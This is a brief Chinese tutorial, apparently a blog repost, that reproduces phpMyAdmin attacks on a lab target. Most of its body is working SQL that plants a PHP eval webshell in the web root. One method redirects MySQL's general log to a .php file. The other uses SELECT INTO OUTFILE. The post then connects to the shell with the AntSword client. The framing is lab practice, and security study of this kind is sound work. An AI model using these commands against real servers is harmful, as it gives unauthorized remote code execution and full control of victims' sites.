当前位置: 首页 > article >正文

PhPMyadmin-cms漏洞复现

article 2024/12/29 5:30:21

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

show global variables like '%general%';

set global general_log='on'; //⽇志保存状态开启;

set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置

show global variables like '%general%';

select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试


http://www.kler.cn/a/455943.html

相关文章:

  • 【教程】通过Docker运行AnythingLLM
  • 视频会议是如何实现屏幕标注功能的?
  • Socket学习(一):控制台聊天demo
  • Linux总结之CentOS Stream 9安装mysql8.0实操安装成功记录
  • Animated Drawings:让纸上的角色动起来
  • WinForm 美化秘籍:轻松实现 Panel 圆角虚线边框
  • xdoj最长的整数序列
  • node.js和js
  • MYSQL无法被连接问题
  • diffusion model evolution
  • 常用数据结构 - 前缀树
  • 七、队列————相关概念详解
  • “图书馆服务自动化”:基于SSM框架的图书借阅系统开发
  • WebSocket实现直播弹幕滚动推送效果
  • 【环境配置】Jupyter Notebook切换虚拟环境
  • Html——10 关键字和描述
  • CSS基础入门【2】
  • Python爬虫(一)- Requests 安装与基本使用教程
  • [Android]init中添加新的command
  • 高中数学刷题版:函数奇偶性[干货]
  • GaussDB典型SQL调优点之自诊断和语句下推调优
  • 五模型对比!Transformer-GRU、Transformer、CNN-GRU、GRU、CNN五模型多变量时间序列预测
  • Kafka_2.13-3.6.0 常用命令快速指南
  • .net core 的软件开发流程
  • Springboot关于格式化记录
  • java常用类(下)